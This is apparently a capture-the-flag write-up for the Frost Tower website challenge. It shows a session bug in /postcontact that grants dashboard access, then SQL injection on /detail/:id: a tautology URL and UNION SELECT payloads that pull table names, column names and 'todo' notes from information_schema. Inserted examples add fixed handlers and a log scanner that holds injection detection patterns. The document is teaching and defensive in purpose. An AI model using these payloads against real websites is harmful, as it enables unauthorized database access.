
Frost Tower Website Checkup

Difficulty Level: (rating shown as an image in the original)
Challenge:
Investigate Frost Tower's website for security issues.
This source code will be useful in your analysis. In Jack Frost's TODO list, what job position does Jack plan to offer Santa?
Ribb Bonbowford, in Santa's dining room, may have some pointers for you.

High level plan

Below is the high-level plan after examining the code.

  1. Broken auth: exploit the /postcontact endpoint to obtain a session and get access to the dashboard.
  2. SQL injection: exploit the /detail endpoint to find the additional table name ("todo") and its column names.
  3. Read the rows of the "todo" table, which hold the job position for Santa.

Get access to dashboard: exploit broken auth

The base URL of the website is https://staging.jackfrosttower.com/. Looking at the source code (server.js), we can work out the different endpoints and their pages.
For example:
a) Dashboard
b) Login

Look at server.js (around line 670).
The /dashboard endpoint needs a session uniqueid, which is apparently created only after authentication.

The /postcontact endpoint checks whether the contact already exists, and it saves the requested email in session.uniqueid.
So, we first create a contact with a specific email address and then use the same email address to try to create another contact.
That second request fails, but the email is still stored in session.uniqueid. [server.js, around line 151]

As we see below, entering another contact with the email Stephan.Strange@gmail.com fails.
However, because session.uniqueid is set to the email address due to the bug, we now have a session.
Now we can access the dashboard at https://staging.jackfrosttower.com/dashboard.

Adding contact with email "Stephan.Strange@marvel.com".
Contact successfully added.
Tried adding another contact with same email "Stephan.Strange@marvel.com".
Fails with "Email Already exists" error.
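To make the defect concrete, here is an added example (not the challenge's server.js, and not code from the writeup's author) that models the behaviour described above: a contact handler that writes the submitted email into session.uniqueid before the duplicate check decides whether the request succeeds, next to a fixed version where only a real login marks the session as authenticated. The contact store, session field names and handler names are assumptions.

```javascript
// Added example (not the challenge's server.js): the session-handling
// defect the writeup describes, next to a hardened version.
// Names (contact store, session fields, handler names) are assumptions.

// Constructed in-memory stand-in for the uniquecontact table.
function makeContactStore() {
  const emails = new Set();
  return {
    exists: (email) => emails.has(email.toLowerCase()),
    add: (email) => emails.add(email.toLowerCase()),
  };
}

// Vulnerable pattern: the session identifier is written from the request
// *before* the duplicate check rejects it, so a failed request still
// leaves behind a session the dashboard guard accepts.
function postContactVulnerable(store, session, email) {
  session.uniqueid = email;              // defect: set unconditionally
  if (store.exists(email)) {
    return { ok: false, message: 'Email Already exists' };
  }
  store.add(email);
  return { ok: true, message: 'Contact successfully added.' };
}

// Hardened pattern: adding a contact never touches the session.
function postContactFixed(store, session, email) {
  if (store.exists(email)) {
    return { ok: false, message: 'Email Already exists' };
  }
  store.add(email);
  return { ok: true, message: 'Contact successfully added.' };
}

// The only place the fixed app marks a session as authenticated.
// passwordOk stands in for a real credential check (assumed).
function loginFixed(session, username, passwordOk) {
  if (!passwordOk) return false;
  session.authenticated = true;
  session.user = username;
  return true;
}

// Dashboard guard in each variant.
function dashboardAllowedVulnerable(session) {
  return Boolean(session.uniqueid);      // any non-empty value passes
}
function dashboardAllowedFixed(session) {
  return session.authenticated === true;
}

// Scenario from the writeup: add a contact, then resubmit the same email,
// then ask whether the resulting session may open the dashboard.
function replayScenario(handler, guard) {
  const store = makeContactStore();
  const session = {};
  handler(store, session, 'Stephan.Strange@marvel.com');
  const second = handler(store, session, 'Stephan.Strange@marvel.com');
  return { secondOk: second.ok, dashboard: guard(session) };
}

console.log('vulnerable:', replayScenario(postContactVulnerable, dashboardAllowedVulnerable));
console.log('fixed:     ', replayScenario(postContactFixed, dashboardAllowedFixed));
```

The point to take from the fixed version is that a session should carry an explicit authentication flag set in exactly one code path, and every protected route should test that flag rather than the mere presence of some value in the session.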


Get additional table: exploit SQL injection

Now that we have access to the dashboard, we navigate there. In the dashboard, we see the "Detail" and "Edit" functions.

Looking at the details of one contact:
https://staging.jackfrosttower.com/detail/68

Now let's look at server.js for the corresponding code for /detail/:id.
It takes a comma-separated list of contact IDs, splits it on the comma, and builds a WHERE clause from the pieces.
For example, if we send
https://staging.jackfrosttower.com/detail/67,68
the query below gets executed:
SELECT * FROM uniquecontact WHERE id=67 OR id=68
and two records are shown on the web page.

(Screenshots in the original: the code, the input and the output result.)


But if we add an OR 1=1, it shows all contacts (tautology-based SQL injection):
https://staging.jackfrosttower.com/detail/67,68%20OR%201=1
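The root cause is string concatenation of the path segment into SQL. The added example below (not the challenge's server.js, and not the writeup author's code) shows a builder that behaves the way the writeup describes beside a hardened builder that only accepts a list of integers and passes them as bound parameters. The function names, the 50-ID cap and the mysql-style `?` placeholder convention are assumptions.

```javascript
// Added example (not the challenge's server.js). buildDetailQueryUnsafe
// reproduces the behaviour the writeup describes for /detail/:id; the
// hardened builder is an assumed replacement using bound parameters.

// Unsafe: pieces of the path segment are concatenated straight into SQL,
// so anything after the last comma becomes part of the WHERE clause.
function buildDetailQueryUnsafe(idParam) {
  const parts = String(idParam).split(',');
  const where = parts.map((p) => `id=${p}`).join(' OR ');
  return `SELECT * FROM uniquecontact WHERE ${where}`;
}

// Hardened: every piece must be a plain integer, the list is capped, and
// the values travel as bound parameters (mysql-style `?` placeholders),
// never as text inside the statement.
function buildDetailQuerySafe(idParam, maxIds = 50) {
  const parts = String(idParam).split(',').map((p) => p.trim());
  if (parts.length === 0 || parts.length > maxIds) {
    return { error: 'bad id count' };
  }
  const ids = [];
  for (const p of parts) {
    if (!/^\d{1,10}$/.test(p)) {
      return { error: `invalid id: ${JSON.stringify(p)}` };
    }
    ids.push(Number(p));
  }
  const placeholders = ids.map(() => '?').join(', ');
  return {
    sql: `SELECT * FROM uniquecontact WHERE id IN (${placeholders})`,
    params: ids,
  };
}

// Constructed inputs: the two requests shown in the writeup.
for (const input of ['67,68', '67,68 OR 1=1']) {
  console.log('unsafe:', buildDetailQueryUnsafe(input));
  console.log('safe:  ', JSON.stringify(buildDetailQuerySafe(input)));
}
```

With a driver such as mysql2 the `sql` and `params` pair would be handed to `query(sql, params)`; because the IDs are bound values and the validator only lets digits through, the `OR 1=1` and `UNION` variants in this writeup are rejected before any SQL is built.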


Going back to the original question

In Jack Frost's TODO list, what job position does Jack plan to offer Santa?

The zip file containing the source code also contains the database schema, in encontact_db.sql.
None of the tables in encontact_db.sql look like they could store the TODO items we need to find.
This means there are additional tables that the source code does not show us.

So, we query the system database views (INFORMATION_SCHEMA) to find the additional tables.

https://staging.jackfrosttower.com/detail/1,30 
UNION SELECT * FROM (SELECT 9999)a 
JOIN (SELECT 8888)b 
JOIN (SELECT TABLE_NAME from information_schema.TABLES as email )c 
JOIN (SELECT 7777)d 
JOIN (SELECT 6666)e 
JOIN (SELECT 5555)f 
JOIN (SELECT 4444)g --

In the above query, we combine the uniquecontact rows with hard-coded values and with the table names from INFORMATION_SCHEMA.TABLES.
It is a UNION, which requires that the number of columns (and their names) match between the tables being union'ed.

Column in "uniquecontact"   Hard-coded value in the UNION
id                          9999
full_name                   8888
email                       SELECT TABLE_NAME from information_schema.TABLES
phone                       7777
contry                      6666
date_created                5555
date_update                 4444

When we request the above URL with the SQL injection payload, the table names from information_schema.TABLES appear in the email field, as set up above.

https://staging.jackfrosttower.com/detail/67,68 UNION SELECT * FROM (SELECT 9999)a 
JOIN (SELECT 8888)b 
JOIN (SELECT TABLE_NAME from information_schema.TABLES as email )c 
JOIN (SELECT 7777)d
JOIN (SELECT 6666)e 
JOIN (SELECT 5555)f 
JOIN (SELECT 4444)g --


Now we have an additional "todo" table, which may hold the answer to "what job position does Jack plan to offer Santa".
Next, let's find the columns of the "todo" table using the same method, but with INFORMATION_SCHEMA.COLUMNS.
The only difference is that we concatenate all the column names into a CSV with the group_concat() function.

https://staging.jackfrosttower.com/detail/37,68 UNION ALL SELECT * FROM (SELECT 9999)a 
JOIN (SELECT 8888)b 
JOIN (SELECT group_concat(COLUMN_NAME) from information_schema.COLUMNS as email)c 
JOIN (SELECT 7777)d 
JOIN (SELECT 6666)e 
JOIN (SELECT 5555)f 
JOIN (SELECT 4444)g --

Now we see the columns in all the three tables.
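From the defender's side, the UNION and information_schema requests in the two sections above leave a clear trace in the web server log. The added example below (not part of the writeup, and not code from the challenge) parses constructed combined-format access log lines, URL-decodes the /detail/ id segment and flags every request whose segment is anything other than a comma-separated list of integers, naming which marker triggered. The log lines, the marker list and the function names are all constructed for this example.

```javascript
// Added example (not from the writeup or the challenge): a log check that
// flags /detail/ requests whose id segment is not a CSV of integers.
// SAMPLE_LOG is constructed; the format is Apache/Nginx combined log.

const SAMPLE_LOG = [
  '10.0.0.5 - - [25/Dec/2021:10:00:01 +0000] "GET /detail/68 HTTP/1.1" 200 512',
  '10.0.0.5 - - [25/Dec/2021:10:00:09 +0000] "GET /detail/67,68 HTTP/1.1" 200 980',
  '10.0.0.7 - - [25/Dec/2021:10:01:15 +0000] "GET /detail/67,68%20OR%201=1 HTTP/1.1" 200 41020',
  '10.0.0.7 - - [25/Dec/2021:10:02:30 +0000] "GET /detail/1,30%20UNION%20SELECT%20*%20FROM%20(SELECT%209999)a%20JOIN%20(SELECT%20TABLE_NAME%20from%20information_schema.TABLES%20as%20email)c%20-- HTTP/1.1" 200 3300',
  '10.0.0.9 - - [25/Dec/2021:10:03:00 +0000] "GET /dashboard HTTP/1.1" 200 2200',
];

// ip, ident, user, [time], "method path protocol", status, bytes
const REQUEST_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\d+|-)/;

// What the hardened /detail handler would accept: digits and commas only.
const ID_LIST_RE = /^\d+(,\d+)*$/;

// Markers seen in this writeup's payloads, checked after URL decoding.
const SQL_MARKERS = [
  { name: 'union', re: /\bunion\b/i },
  { name: 'information_schema', re: /information_schema/i },
  { name: 'group_concat', re: /group_concat/i },
  { name: 'tautology', re: /\bor\b\s+\d+\s*=\s*\d+/i },
  { name: 'comment terminator', re: /--\s*$/ },
];

function parseLine(line) {
  const m = REQUEST_RE.exec(line);
  if (!m) return null;
  return { ip: m[1], time: m[2], method: m[3], path: m[4], status: Number(m[5]) };
}

// Decode %xx and '+' escapes; malformed escapes are kept as-is rather than
// letting a bad request crash the scanner.
function safeDecode(s) {
  try { return decodeURIComponent(s.replace(/\+/g, ' ')); } catch (e) { return s; }
}

function inspectDetailRequest(entry) {
  const m = /^\/detail\/([^?]*)/.exec(entry.path);
  if (!m) return null;                            // not a /detail/ request
  const idSegment = safeDecode(m[1]);
  if (ID_LIST_RE.test(idSegment)) return null;    // well-formed id list
  const reasons = SQL_MARKERS.filter((mk) => mk.re.test(idSegment)).map((mk) => mk.name);
  if (reasons.length === 0) reasons.push('non-numeric id list');
  return { ip: entry.ip, time: entry.time, status: entry.status, idSegment, reasons };
}

function findSuspiciousDetailRequests(lines) {
  const hits = [];
  for (const line of lines) {
    const entry = parseLine(line);
    if (!entry) continue;                         // unparseable line, skip
    const hit = inspectDetailRequest(entry);
    if (hit) hits.push(hit);
  }
  return hits;
}

for (const hit of findSuspiciousDetailRequests(SAMPLE_LOG)) {
  console.log(`${hit.time} ${hit.ip} /detail/${hit.idSegment} -> ${hit.reasons.join(', ')}`);
}
```

The deciding check is the allow-list (ID_LIST_RE), not the marker list: any id segment that the hardened handler would reject is worth a look, and the markers only annotate why. A 200 status with an unusually large response size on such a request, as in the third sample line, is the other signal that the tautology actually dumped the table.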


Extract data from additional table

We now focus on the newly found "todo" table.
The most relevant column here is note, so we read the values of the note column from the "todo" table.

https://staging.jackfrosttower.com/detail/1,30 UNION ALL SELECT * FROM (SELECT 9999)a 
JOIN (SELECT 8888)b 
JOIN (SELECT note from todo as email)c 
JOIN (SELECT 7777)d 
JOIN (SELECT 6666)e 
JOIN (SELECT 5555)f 
JOIN (SELECT 4444)g --

Now we see all the notes from the "todo" table, and one of them says Jack Frost planned to offer Santa the clerk position.
We enter "clerk" as the answer and it is accepted!!
